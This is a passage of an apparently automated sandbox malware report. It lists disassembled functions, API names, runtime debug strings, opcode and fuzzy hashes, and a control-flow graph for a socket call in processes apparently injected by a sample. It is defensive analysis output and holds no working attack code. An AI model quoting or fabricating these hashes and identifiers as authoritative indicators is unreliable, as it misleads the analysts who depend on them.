                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_af0000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                                                                                  • Instruction ID: f10f45b227cb9b2f9e539f9a572e59930f1ebf5f534aad87648dfc8b0c813520
                                                                                                                                                                                  • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                                                                                  • Instruction Fuzzy Hash: 96023675508345AFC305CF18C491A6BBBE5EFC8700F1489ADFA899B261DB31E909CB82
                                                                                                                                                                                  Function 00B6B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4145755865.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_af0000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __aulldvrm
                                                                                                                                                                                  • String ID: +$-$0$0
                                                                                                                                                                                  • API String ID: 1302938615-699404926
                                                                                                                                                                                  • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                                                                  • Instruction ID: bc289b3b4f9f72000b0f5ee7447e8f3fa59dc76f5f1eb3170ccb930304d03a34
                                                                                                                                                                                  • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                                                                  • Instruction Fuzzy Hash: 79819E70E452499EDF249E68C891FFEBBF6EF95310F18419AE861E7291C7389CC08B50
                                                                                                                                                                                  Function 00BD20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4145755865.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_af0000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                                                  • String ID: %%%u$[$]:%u
                                                                                                                                                                                  • API String ID: 48624451-2819853543
                                                                                                                                                                                  • Opcode ID: ca998306232a8c44cea3cc9e2cf1312c72920a748bf4183b285bba6b5542a4a5
                                                                                                                                                                                  • Instruction ID: 648795912106557ff18d4487d7a69c5b4e5e08d7dfc09edae747db73088816ed
                                                                                                                                                                                  • Opcode Fuzzy Hash: ca998306232a8c44cea3cc9e2cf1312c72920a748bf4183b285bba6b5542a4a5
                                                                                                                                                                                  • Instruction Fuzzy Hash: 01215E76A00159ABDB10DF69CC41AEEBBF8EF68750F4441A6E915E3241FB309A018BA1
                                                                                                                                                                                  Function 00B4F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00B902BD
                                                                                                                                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00B902E7
                                                                                                                                                                                  • RTL: Re-Waiting, xrefs: 00B9031E
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4145755865.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_af0000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                                                  • API String ID: 0-2474120054
                                                                                                                                                                                  • Opcode ID: b19ad6f841b6f4f08b9c4908618d6dabcca5c851ce65323175aa99fc763228af
                                                                                                                                                                                  • Instruction ID: a488f2e959c5b85962d3afe8a726d8a75c0e16fe426833c76bdddf50bed9afc2
                                                                                                                                                                                  • Opcode Fuzzy Hash: b19ad6f841b6f4f08b9c4908618d6dabcca5c851ce65323175aa99fc763228af
                                                                                                                                                                                  • Instruction Fuzzy Hash: D9E1B030618742DFDB24DF28C885B2AB7E0FF49314F244AA9F5A58B2E1D774DA44DB42
                                                                                                                                                                                  Function 00B5BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00B97B7F
                                                                                                                                                                                  • RTL: Resource at %p, xrefs: 00B97B8E
                                                                                                                                                                                  • RTL: Re-Waiting, xrefs: 00B97BAC
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4145755865.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_af0000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                  • API String ID: 0-871070163
                                                                                                                                                                                  • Opcode ID: a6795db47d305875d1122a03bbf69f078780bd68768f7708112656cfb106f5bd
                                                                                                                                                                                  • Instruction ID: a50a732e5d1a0e35dd1a7a4aa769a7863b5233a658028932f4abc071356518ce
                                                                                                                                                                                  • Opcode Fuzzy Hash: a6795db47d305875d1122a03bbf69f078780bd68768f7708112656cfb106f5bd
                                                                                                                                                                                  • Instruction Fuzzy Hash: DD4104317447029FCB20DE25CC51FAAB7E5EF89711F100AADF95ADB680DB70E8098B91
                                                                                                                                                                                  Function 00B5B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B9728C
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 00B97294
                                                                                                                                                                                  • RTL: Resource at %p, xrefs: 00B972A3
                                                                                                                                                                                  • RTL: Re-Waiting, xrefs: 00B972C1
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4145755865.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_af0000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                  • API String ID: 885266447-605551621
                                                                                                                                                                                  • Opcode ID: 05be1cb89ae62e6e9905484dec232af57a0b674fe1dcccbeca51fcc76a03b14e
                                                                                                                                                                                  • Instruction ID: 983f660b3a4d5eb730553ebab2a0523a9b75e001c4e595c036982e0d32b6abf4
                                                                                                                                                                                  • Opcode Fuzzy Hash: 05be1cb89ae62e6e9905484dec232af57a0b674fe1dcccbeca51fcc76a03b14e
                                                                                                                                                                                  • Instruction Fuzzy Hash: F4411231654606ABCB20DF64CC82F6AB7E1FF85711F2006A8FC55AB381DB30E81687D1
                                                                                                                                                                                  Function 00BD2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4145755865.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_af0000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                                                  • String ID: %%%u$]:%u
                                                                                                                                                                                  • API String ID: 48624451-3050659472
                                                                                                                                                                                  • Opcode ID: b8e5f875beba4a115b0b4e597fbe1613405be7b787a807e4b4a6fb678818b8b8
                                                                                                                                                                                  • Instruction ID: 5e03f72d977d1aa63989bc143344e211518e471ea96a61756d8436ae7bb7a88a
                                                                                                                                                                                  • Opcode Fuzzy Hash: b8e5f875beba4a115b0b4e597fbe1613405be7b787a807e4b4a6fb678818b8b8
                                                                                                                                                                                  • Instruction Fuzzy Hash: B7315076A102599FCB20DF29CC41BEEB7F8EB54710F944596E859E3241FB34AE448FA0
                                                                                                                                                                                  Function 00B67D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4145755865.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_af0000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __aulldvrm
                                                                                                                                                                                  • String ID: +$-
                                                                                                                                                                                  • API String ID: 1302938615-2137968064
                                                                                                                                                                                  • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                                                                  • Instruction ID: ea11251b23579d69c7b52828429b039df4cdcd3be808fe0665997f527ddeef5a
                                                                                                                                                                                  • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                                                                  • Instruction Fuzzy Hash: CF91B570E842569BDF24DE69C881ABEB7E5FF44728F24469AE855E72C0DF3C8D408B50
                                                                                                                                                                                  Function 00B29126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4145755865.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_af0000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: $$@
                                                                                                                                                                                  • API String ID: 0-1194432280
                                                                                                                                                                                  • Opcode ID: a733d43706e704eab295929810c4fffa1a003004e5261fb38b402834666e70dd
                                                                                                                                                                                  • Instruction ID: 712f0126e25c9713e8804862ae292bf14637e8ab75d796fa8ce3f50c27fc91b8
                                                                                                                                                                                  • Opcode Fuzzy Hash: a733d43706e704eab295929810c4fffa1a003004e5261fb38b402834666e70dd
                                                                                                                                                                                  • Instruction Fuzzy Hash: A8810971D002699BDB21DF54DC45BEEB7B8AF09750F1081EAA91DB7290E7709E84CFA0

                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                  Execution Coverage:30.3%
                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                  Total number of Nodes:3
                                                                                                                                                                                  Total number of Limit Nodes:0
                                                                                                                                                                                  execution_graph 37 50389ba 38 50389c1 socket 37->38 40 5038a6e 38->40

                                                                                                                                                                                  Callgraph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  • Opacity -> Relevance
                                                                                                                                                                                  • Disassembly available
                                                                                                                                                                                  callgraph 0 Function_05074CE6 1 Function_050389BA 2 Function_050387FA 1->2 3 Function_05035898 4 Function_05074CBA

                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                  Function 050389BA Relevance: 1.6, APIs: 1, Instructions: 133networkCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 0 50389ba-50389c0 1 50389c1-50389cf 0->1 2 50389d0 1->2 3 50389f8-50389fc 1->3 2->3 4 50389d2-50389f6 2->4 5 5038a4f-5038a52 3->5 6 50389fe-5038a16 3->6 4->1 8 5038a55-5038a59 5->8 7 5038a21-5038a27 6->7 7->5 9 5038a29-5038a4d 7->9 8->8 10 5038a5b-5038a68 socket 8->10 9->7 12 5038b05 10->12 13 5038a6e-5038a75 10->13 14 5038b50-5038b79 12->14 15 5038b07-5038b08 12->15 16 5038a80-5038a86 13->16 17 5038a88-5038aac 16->17 18 5038aae-5038ab2 16->18 17->16 20 5038af4-5038b02 call 50387fa 18->20 21 5038ab4-5038abb 18->21 20->12 22 5038ac6-5038acc 21->22 22->20 24 5038ace-5038af2 22->24 24->22
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000008.00000002.4147180609.0000000004FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 04FC0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_4fc0000_neghZqrDWkxUmu.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: socket
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 98920635-0
                                                                                                                                                                                  • Opcode ID: 5d74ee9ca9276a9febe35f65de1782e7c5bec6596a1cea3daf91ded093ea2afe
                                                                                                                                                                                  • Instruction ID: ea0f0ed1192fb8ef6dd96b2c755933aed9c285744abd90c72e089e222e76910c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5d74ee9ca9276a9febe35f65de1782e7c5bec6596a1cea3daf91ded093ea2afe
                                                                                                                                                                                  • Instruction Fuzzy Hash: F9519871E09158DFCF09CF98E491AADBBF6BF49314F1880C9E406AB351C734A902CB54